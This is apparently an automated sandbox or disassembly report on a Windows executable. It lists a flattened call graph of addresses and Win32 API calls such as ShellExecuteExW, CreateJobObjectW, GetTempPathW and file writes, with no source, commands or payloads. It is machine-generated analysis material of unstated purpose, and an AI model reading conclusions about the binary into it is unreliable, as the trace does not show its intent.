402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 4026b0 lstrcmpW 9965->9966 9967 404b1f 9966->9967 9968 404b6f 9967->9968 9970 401370 2 API calls 9967->9970 9969 4026b0 lstrcmpW 9968->9969 9971 404b8d 9969->9971 9972 404b36 9970->9972 9974 4026b0 lstrcmpW 9971->9974 9973 402187 19 API calls 9972->9973 9975 404b3d 9973->9975 9976 404ba5 9974->9976 9977 4027c2 2 API calls 9975->9977 9979 4026b0 lstrcmpW 9976->9979 9978 404b46 9977->9978 9980 401370 2 API calls 9978->9980 9981 404bbd 9979->9981 9982 404b5f 9980->9982 9984 4026b0 lstrcmpW 9981->9984 9983 402187 19 API calls 9982->9983 9985 404b66 9983->9985 9986 404bd5 9984->9986 9987 4027c2 2 API calls 9985->9987 9988 404bec 9986->9988 9989 404bdc lstrcmpiW 9986->9989 9987->9968 9990 4026b0 lstrcmpW 9988->9990 9989->9988 9991 404c02 9990->9991 9992 4026b0 lstrcmpW 9991->9992 9993 404c2f 9992->9993 9994 404c3c 9993->9994 10526 4043a6 9993->10526 9996 4026b0 lstrcmpW 9994->9996 10000 404c50 9996->10000 9997 404c70 9999 4026b0 lstrcmpW 9997->9999 10006 404c83 9999->10006 10000->9997 10001 4026b0 lstrcmpW 10000->10001 10530 40434d 10000->10530 10001->10000 10002 404ca3 10003 4026b0 lstrcmpW 10002->10003 10005 404caf 10003->10005 10007 4026b0 lstrcmpW 10005->10007 10006->10002 10008 4026b0 lstrcmpW 10006->10008 10534 40437e 10006->10534 10009 404cc0 10007->10009 10008->10006 10010 4026b0 lstrcmpW 10009->10010 10011 404cd1 10010->10011 10012 404ce7 10011->10012 10013 404cde _wtol 10011->10013 10014 4026b0 lstrcmpW 10012->10014 10013->10012 10015 404cf3 10014->10015 10016 404d03 10015->10016 10017 404cfa _wtol 10015->10017 10018 4026b0 lstrcmpW 10016->10018 10017->10016 10019 404d0f 10018->10019 10020 4026b0 lstrcmpW 10019->10020 10021 404d27 10020->10021 10022 4026b0 lstrcmpW 10021->10022 10023 404d3f 10022->10023 10023->9675 10542 40261a 10024->10542 10028 404648 10027->10028 10030 404605 10027->10030 10028->9644 10028->9645 10029 40133e 2 API calls 10029->10030 10030->10029 10031 4041f8 20 API calls 10030->10031 10032 404622 SetEnvironmentVariableW ??3@YAXPAX 10031->10032 10032->10028 10032->10030 10034 401458 2 API calls 10033->10034 10035 404556 10034->10035 10036 4027aa 2 API calls 10035->10036 10037 40455f GetTempPathW 10036->10037 10038 404578 10037->10038 10043 40458f 10037->10043 10039 4027aa 2 API calls 10038->10039 10040 404583 GetTempPathW 10039->10040 10040->10043 10041 4027aa 2 API calls 10042 4045b2 wsprintfW 10041->10042 10042->10043 10043->10041 10044 4045c9 GetFileAttributesW 10043->10044 10045 4045ed 10043->10045 10044->10043 10044->10045 10045->9722 10047 401745 10046->10047 10062 40d041 3 API calls 10047->10062 10048 401769 10049 401794 10048->10049 10546 40110a 10048->10546 10051 408dbf 57 API calls 10049->10051 10055 40179c 10051->10055 10053 4017bc 10054 4017d4 ??2@YAPAXI 10053->10054 10056 4036f1 88 API calls 10053->10056 10057 4017e0 10054->10057 10058 4017e7 10054->10058 10055->9739 10059 4017cf 10056->10059 10569 401470 10057->10569 10550 401611 10058->10550 10059->10054 10059->10055 10062->10048 10064 402426 10063->10064 10065 40242b 10063->10065 10064->9840 10066 40236f 3 API calls 10065->10066 10067 402430 10066->10067 10068 402441 10067->10068 10069 40243a 10067->10069 10068->9840 10987 4023e9 LoadLibraryA GetProcAddress 10069->10987 10073 4044c6 2 API calls 10072->10073 10074 4048b7 10073->10074 10075 401429 2 API calls 10074->10075 10076 4048c2 10075->10076 10077 4048c7 10076->10077 10078 40133e 2 API calls 10077->10078 10079 4048d5 10078->10079 10080 4027c2 2 API calls 10079->10080 10081 4048e0 10080->10081 10081->9858 10083 401458 2 API calls 10082->10083 10084 404f78 10083->10084 10085 401458 2 API calls 10084->10085 10086 404f80 memset 10085->10086 10087 404fae 10086->10087 10088 404a97 2 API calls 10087->10088 10089 404fd1 10088->10089 10090 401370 2 API calls 10089->10090 10091 404fdc 10090->10091 10092 404fe1 ??3@YAXPAX 10091->10092 10093 404ffa ShellExecuteExW 10091->10093 10094 404fec ??3@YAXPAX 10092->10094 10095 405014 10093->10095 10096 40503a 10093->10096 10094->9864 10097 405028 CloseHandle 10095->10097 10098 40501d WaitForSingleObject 10095->10098 10099 405031 ??3@YAXPAX 10096->10099 10097->10099 10098->10097 10099->10094 10101 407c87 4 API calls 10100->10101 10102 404eb5 10101->10102 10103 402187 19 API calls 10102->10103 10104 404ec3 10103->10104 10105 402771 2 API calls 10104->10105 10106 404ecd 10105->10106 10107 404f03 wsprintfW 10106->10107 10109 4027c2 ??2@YAPAXI ??3@YAXPAX 10106->10109 10108 4027c2 2 API calls 10107->10108 10110 404f31 10108->10110 10109->10106 10111 4027c2 2 API calls 10110->10111 10112 404f3e 10111->10112 10113 407ce8 22 API calls 10112->10113 10114 404f53 ??3@YAXPAX 10113->10114 10989 407a5b ??3@YAXPAX 10114->10989 10116 404f64 10116->9563 10118 40cdda ctype 3 API calls 10117->10118 10119 404521 10118->10119 10120 40ccfd ctype 3 API calls 10119->10120 10121 40ce45 ??3@YAXPAX 10120->10121 10121->9551 10123 4052b4 10122->10123 10129 4052d0 10122->10129 10126 4052c6 _wtol 10123->10126 10123->10129 10124 404f67 9 API calls 10125 4052f3 10124->10125 10127 405301 10125->10127 10128 4052fb GetLastError 10125->10128 10126->10129 10127->9563 10128->10127 10129->10124 10131 40ca5c 2 API calls 10130->10131 10132 4054ed 10131->10132 10133 405549 10132->10133 10135 402771 2 API calls 10132->10135 10134 402823 2 API calls 10133->10134 10136 405551 10134->10136 10141 4054fc 10135->10141 10137 4028b9 2 API calls 10136->10137 10138 40555e 10137->10138 10139 402953 2 API calls 10138->10139 10143 40556b 10139->10143 10140 4055ba ??3@YAXPAX 10146 4055b6 10140->10146 10141->10140 10142 4036f1 88 API calls 10141->10142 10144 405520 10142->10144 10145 402953 2 API calls 10143->10145 10144->10140 10148 40ca5c 2 API calls 10144->10148 10147 405578 10145->10147 10146->9620 10149 402953 2 API calls 10147->10149 10151 40553c 10148->10151 10150 405585 10149->10150 10152 40d0a5 2 API calls 10150->10152 10151->10140 10153 405540 ??3@YAXPAX 10151->10153 10154 405599 10152->10154 10153->10133 10154->10140 10155 4055a2 ??3@YAXPAX 10154->10155 10155->10146 10157 402823 2 API calls 10156->10157 10173 403415 10157->10173 10158 4036b4 ??3@YAXPAX 10159 4036eb 10158->10159 10159->9608 10159->9613 10160 401458 ??2@YAPAXI ??3@YAXPAX 10160->10173 10161 402823 2 API calls 10161->10173 10162 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 10162->10173 10163 4013a9 2 API calls 10164 403486 ??3@YAXPAX ??3@YAXPAX 10163->10164 10165 4036c0 10164->10165 10164->10173 10995 402d30 10165->10995 10169 4036e1 ??3@YAXPAX 10169->10159 10170 403593 strncmp 10172 40357e strncmp 10170->10172 10170->10173 10172->10170 10172->10173 10173->10158 10173->10160 10173->10161 10173->10162 10173->10163 10173->10165 10173->10170 10175 40292b ??2@YAPAXI ??3@YAXPAX 10173->10175 10176 4013a9 2 API calls 10173->10176 10177 40292b 2 API calls 10173->10177 10181 403648 lstrlenW wcsncmp 10173->10181 10182 40261a lstrcmpW 10173->10182 10183 4032d9 7 API calls 10173->10183 10184 401370 2 API calls 10173->10184 10990 402662 10173->10990 10994 40269a ??3@YAXPAX ??3@YAXPAX 10173->10994 10175->10173 10178 403600 ??3@YAXPAX 10176->10178 10177->10172 10179 402dd6 9 API calls 10178->10179 10180 403611 lstrcmpW 10179->10180 10180->10173 10181->10173 10182->10173 10183->10173 10184->10173 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 4043c4 10526->10527 10538 4042ea 10527->10538 10531 40435a 10530->10531 10532 4042ea _wtol 10531->10532 10533 40437b 10532->10533 10533->10000 10535 40438b 10534->10535 10536 4042ea _wtol 10535->10536 10537 4043a3 10536->10537 10537->10006 10539 4042f4 10538->10539 10540 40430f _wtol 10539->10540 10541 404348 10539->10541 10540->10539 10541->9994 10545 402625 10542->10545 10543 402631 lstrcmpW 10544 40264e 10543->10544 10543->10545 10544->9682 10545->10543 10545->10544 10574 410e26 10546->10574 10582 410329 _EH_prolog 10546->10582 10547 40112a 10547->10049 10547->10053 10551 401624 10550->10551 10552 401370 2 API calls 10551->10552 10553 401631 10552->10553 10554 401526 2 API calls 10553->10554 10555 40163a CreateThread 10554->10555 10556 401669 10555->10556 10557 40166e WaitForSingleObject 10555->10557 10981 4012e3 10555->10981 10558 40851f 25 API calls 10556->10558 10559 40168b 10557->10559 10560 4016bd 10557->10560 10558->10557 10563 4016a9 10559->10563 10565 40169a 10559->10565 10561 4016b9 10560->10561 10562 4016c5 GetExitCodeThread 10560->10562 10561->10055 10564 4016dc 10562->10564 10566 408dbf 57 API calls 10563->10566 10564->10561 10564->10565 10567 40170b SetLastError 10564->10567 10565->10561 10568 408dbf 57 API calls 10565->10568 10566->10561 10567->10565 10568->10561 10570 401458 2 API calls 10569->10570 10571 401489 10570->10571 10572 401458 2 API calls 10571->10572 10573 401495 10572->10573 10573->10058 10575 410e38 10574->10575 10581 40d041 3 API calls 10575->10581 10576 410e4c 10579 410e83 10576->10579 10580 40d041 3 API calls 10576->10580 10577 410e60 10577->10579 10598 410ccb 10577->10598 10579->10547 10580->10577 10581->10576 10583 410349 10582->10583 10584 410e26 11 API calls 10583->10584 10585 41036e 10584->10585 10586 410390 10585->10586 10587 410377 10585->10587 10626 4127aa _EH_prolog 10586->10626 10629 40ff49 10587->10629 10611 40e0d0 10598->10611 10600 410cf7 10600->10579 10601 410ce3 10601->10600 10614 40e036 10601->10614 10604 410d30 10605 410dc4 ??3@YAXPAX 10604->10605 10606 410dcf ??3@YAXPAX 10604->10606 10608 410dad memmove 10604->10608 10609 410dd9 memcpy 10604->10609 10605->10600 10606->10600 10608->10604 10610 40d041 3 API calls 10609->10610 10610->10606 10622 40e085 10611->10622 10615 40e080 memcpy 10614->10615 10616 40e043 10614->10616 10615->10604 10617 40e048 ??2@YAPAXI 10616->10617 10618 40e06e 10616->10618 10619 40e070 ??3@YAXPAX 10617->10619 10620 40e058 memmove 10617->10620 10618->10619 10619->10615 10620->10619 10623 40e0c9 10622->10623 10624 40e097 10622->10624 10623->10601 10624->10623 10625 40d00d GetLastError 10624->10625 10625->10624 10637 412525 10626->10637 10964 40fdd9 10629->10964 10659 40fc0a 10637->10659 10782 40fb7b 10659->10782 10783 40cdda ctype 3 API calls 10782->10783 10784 40fb84 10783->10784 10785 40cdda ctype 3 API calls 10784->10785 10786 40fb8c 10785->10786 10787 40cdda ctype 3 API calls 10786->10787 10788 40fb94 10787->10788 10789 40cdda ctype 3 API calls 10788->10789 10790 40fb9c 10789->10790 10791 40cdda ctype 3 API calls 10790->10791 10792 40fba4 10791->10792 10793 40cdda ctype 3 API calls 10792->10793 10794 40fbac 10793->10794 10795 40cdda ctype 3 API calls 10794->10795 10796 40fbb6 10795->10796 10797 40cdda ctype 3 API calls 10796->10797 10798 40fbbe 10797->10798 10799 40cdda ctype 3 API calls 10798->10799 10800 40fbcb 10799->10800 10801 40cdda ctype 3 API calls 10800->10801 10802 40fbd3 10801->10802 10803 40cdda ctype 3 API calls 10802->10803 10804 40fbe0 10803->10804 10805 40cdda ctype 3 API calls 10804->10805 10806 40fbe8 10805->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fbf5 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fbfd 10809->10810 10965 40cdda ctype 3 API calls 10964->10965 10966 40fde7 10965->10966 10982 4012ec 10981->10982 10983 4012ff 10981->10983 10982->10983 10984 4012ee Sleep 10982->10984 10985 401338 10983->10985 10986 40132a EndDialog 10983->10986 10984->10982 10986->10985 10988 40240b 10987->10988 10988->10064 10989->10116 10991 402697 10990->10991 10992 40266f lstrcmpW 10990->10992 10991->10173 10993 402686 10992->10993 10993->10991 10993->10992 10994->10173 10996 402d4b 10995->10996 10997 402d3f 10995->10997 10999 402823 2 API calls 10996->10999 11013 401bdf GetStdHandle WriteFile 10997->11013 11001 402d55 10999->11001 11000 402d46 11012 40269a ??3@YAXPAX ??3@YAXPAX 11000->11012 11002 402d80 11001->11002 11007 40292b 2 API calls 11001->11007 11003 402ad8 3 API calls 11002->11003 11004 402d92 11003->11004 11005 402da0 11004->11005 11006 402db4 11004->11006 11008 408dbf 57 API calls 11005->11008 11009 408dbf 57 API calls 11006->11009 11007->11001 11010 402daf ??3@YAXPAX ??3@YAXPAX 11008->11010 11009->11010 11010->11000 11012->10169 11013->11000 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile
                                                    APIs
                                                    • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                      • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                      • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                      • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                      • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                      • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                      • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                      • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                    • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                    • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                    • _wtol.MSVCRT ref: 00405825
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                    • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                    • _wtol.MSVCRT ref: 00405A25
                                                    • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
